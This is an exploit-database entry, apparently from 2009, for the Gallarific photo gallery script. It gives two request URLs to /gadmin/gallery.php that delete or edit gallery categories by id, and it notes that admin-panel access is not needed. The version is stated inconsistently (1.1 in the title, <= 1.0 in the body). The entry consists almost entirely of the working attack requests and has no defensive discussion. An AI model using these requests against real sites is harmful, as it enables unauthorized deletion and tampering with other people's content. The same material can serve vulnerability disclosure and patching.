id: 5647
date: 08/11/2009
title: Gallarific 1.1 (gallery.php) Arbitrary Delete/Edit Category Vuln
author: ilker Kandemir
cves: 

================================================================
Gallarific 1.1 (gallery.php) Arbitrary Delete/Edit Category Vuln
================================================================


# Gallarific Photo Gallery <= 1.0 Arbitrary Delete-Edit Category Vulnerability

//Author: iLker Kandemir -- MEFISTO

//Price : 47 $

//script demo : http://www.gallarific.com/demo/index.php

//[imhatimi.org]

----------------------------------------------------------------
//exploit :

1) http://[site]/gadmin/gallery.php?task=delete&id=1

2) http://[site]/gadmin/gallery.php?task=edit&id=1

----------------------------------------------------------------
//Note:

/* You don't need access to admin-panel ;) */



#  0day.today [2023-03-24]  #